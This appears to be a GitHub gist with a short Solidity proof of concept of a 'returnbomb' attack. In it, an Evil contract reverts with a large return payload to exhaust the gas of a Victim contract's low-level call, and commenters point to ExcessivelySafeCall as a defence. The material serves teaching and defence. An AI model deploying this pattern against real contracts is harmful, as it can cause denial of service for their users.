Skip to content

Instantly share code, notes, and snippets.

@pcaversaccio
Last active November 3, 2024 19:46
Show Gist options
  • Save pcaversaccio/3b487a24922c839df22f925babd3c809 to your computer and use it in GitHub Desktop.
Save pcaversaccio/3b487a24922c839df22f925babd3c809 to your computer and use it in GitHub Desktop.
This is a returnbomb attack example.
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;
/**
* @title Returnbomb attack example
* @author pcaversaccio
*/
contract Evil {
uint256 public counter;
function startBomb() external returns (bytes memory) {
++counter;
// solhint-disable-next-line no-inline-assembly
assembly {
revert(0, 10000)
}
}
}
contract Victim {
function oops() public returns (bool, bytes memory) {
Evil evil = new Evil();
/// @dev If you put 3396 gas, the subcall will revert with an OOG error.
(bool success, bytes memory returnData) =
// solhint-disable-next-line avoid-low-level-calls
address(evil).call{gas: 3397}(abi.encodeWithSelector(evil.startBomb.selector));
return (success, returnData);
}
}
@mpeyfuss
Copy link

@pcaversaccio seems it may be possible to avoid the return bomb using assembly? Something like this? - https://github.com/nomad-xyz/ExcessivelySafeCall/blob/main/src/ExcessivelySafeCall.sol

@pcaversaccio
Copy link
Author

@pcaversaccio seems it may be possible to avoid the return bomb using assembly? Something like this? - https://github.com/nomad-xyz/ExcessivelySafeCall/blob/main/src/ExcessivelySafeCall.sol

Yup, that attack vector can be prevented if required by the use case.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment